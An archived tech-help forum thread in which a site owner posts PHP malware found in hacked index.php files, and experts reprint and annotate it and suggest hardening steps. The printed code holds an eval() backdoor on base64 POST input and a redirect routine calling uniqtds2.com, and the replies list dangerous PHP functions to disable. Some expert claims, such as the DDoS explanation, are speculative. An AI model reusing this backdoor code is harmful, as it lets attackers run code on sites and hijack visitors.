Solved

Boards not loading properly after attack

Posted on 2009-05-15
4
897 Views
Last Modified: 2013-11-11
Today my site suffered an attack (again) and  several index.php pages were deleted and changed with their own files from the hackers. Now i have reversed the damages, but my boards are not loading properly. what can be going wrong? the rest of the site is running smoothly, this is the code they hackers have set in the -now deleted- indes files
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Open in new window

0
Comment
Question by:axtur
  • 2
4 Comments
 
LVL 34

Expert Comment

by:Beverley Portlock
Comment Utility
It seems to be counting traffic. I have not gone into it in detail, but that is what it seems to be doing. I have attached a reformatted version so you can study it in detail

If the site is not running properly then check for .htaccess files and see what they contain. Your FTP client may need a setting to "Show hidden files"
<?php
 

$a = @ $_POST['a'];

if ($a && @ $_POST['b'] == sha1(md5($a))) {

	$a = base64_decode($a);

	eval ($a);

}

function get_counter() {

	$ip = $_SERVER['REMOTE_ADDR'];

	$uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");

	if ($uniq === false) {

		return false;

	}

	if ($uniq == "go") {

		return true;

	}

	return false;

}

$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));

if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {

	if (get_counter()) {

		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);

		die();

	}

}

if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {

	if (get_counter()) {

		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);

		die();

	}

}

?>

Open in new window

0
 
LVL 3

Accepted Solution

by:
markh789 earned 500 total points
Comment Utility
The script, is used as a ddos spot.
Let me explain what there doing, they have bots set to the page, to open it, using a botnet. Not only will the cause to much traffic though it will open http://uniqtds2.com/tds_u.php?dname=*var*, this php script could be doing.. anything, they also have a php Eval(); set up so they can run there own PHP commands, the bots may still be trying to access files. Check your apache logs and see what files there accessing, if its from a random file then use htacces to block that file (look in error.log, something like that).

You should try disabling the function file_get_contents for a few weeks and see if any changes happen.

They could also be trying to make profit off adverts' by redirecting all your users to a porn website, I've seen this done before - and they will register, enter cc details, etc, spam happens money loss, you go it they will do it. Although, since there bots are opening the advert around 10 times / second they get 10 cents a click.. there using your website as a money-maker!

I can recommend is to try and block uniqtds2.com with something like OpenDNS.

Disable the following functions for security:
apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

In your php.ini, if your on a host, request for them to do it for you.

Disabling them functions will help block shells, if you want you can also turn display_errors to false in your php.ini.

Right now, you should be checking EVERY file even .txt files to see if any of the code is there, try upload upgrade files on your board to see if that fixes it.

I've added a few comments to the PHP code, take a look.

If it's only like - 20 bots try blocking all the bots I.P's in .htaccess.
Order Allow, Deny
Allow from *
Deny from bot1
Deny from bot2
Deny from bot3
Deny from bot4
Deny from bot5

(that may be incorrect)
<?php

 

$a = @ $_POST['a'];

if ($a && @ $_POST['b'] == sha1(md5($a))) {

        // Decode base64 code

        $a = base64_decode($a);

        // Run the case64 code

        eval ($a);

}

function get_counter() {

        $ip = $_SERVER['REMOTE_ADDR'];

        // This could be where the ddos is coming from.

        $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");

        if ($uniq === false) {

                return false;

        }

        if ($uniq == "go") {

                return true;

        }

        return false;

}

// Grabs referral, it also checks for bot.htm in the referral 

$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));

if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {

        if (get_counter()) {

                // Redirects to a porn website.

                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);

                die();

        }

}

// Checks to see if "yahoo" or "slurp" is in the referral 

if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {

        if (get_counter()) {

                // Redirects to a porn website.

                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);

                die();

        }

}

?>

Open in new window

0
 

Author Comment

by:axtur
Comment Utility
I have checked the code and I don't see anything strange on it, the only changed file (index.php) has been reverse, no other files have been found.

what can i do? How can i see the hidden files?
0
 
LVL 3

Expert Comment

by:markh789
Comment Utility
file_get_contents could be used a ddos point, to download.
You can easily set bots to that page to tell the server to download the file as many times as it wants.

If you can run shell files you can run the shell line command:
    ls -a /PATH/HERE

Replace /PATH/HERE with you public_html dir, and you can check it for files, etc.

Did you disable the functions:

apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

If you did your fine from further attacks.

If you want ddos protection on your serve then look at what i found here:

Run this in shell:
cd /usr/src
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
tar xfz mod_evasive_1.10.1.tar.gz
cd mod_evasive
type apxs

THEN edit your httpd.conf file and add:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule>

Change your values if needed,

If you have root that is.

If not ask your host for some better ddos protection.
0

Featured Post

Enabling OSINT in Activity Based Intelligence

Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

Join & Write a Comment

Foreword (July, 2015) Since I first wrote this article, years ago, a great many more people have begun using the internet.  They are coming online from every part of the globe, learning, reading, shopping and spending money at an ever-increasing ra…
Password hashing is better than message digests or encryption, and you should be using it instead of message digests or encryption.  Find out why and how in this article, which supplements the original article on PHP Client Registration, Login, Logo…
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

763 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now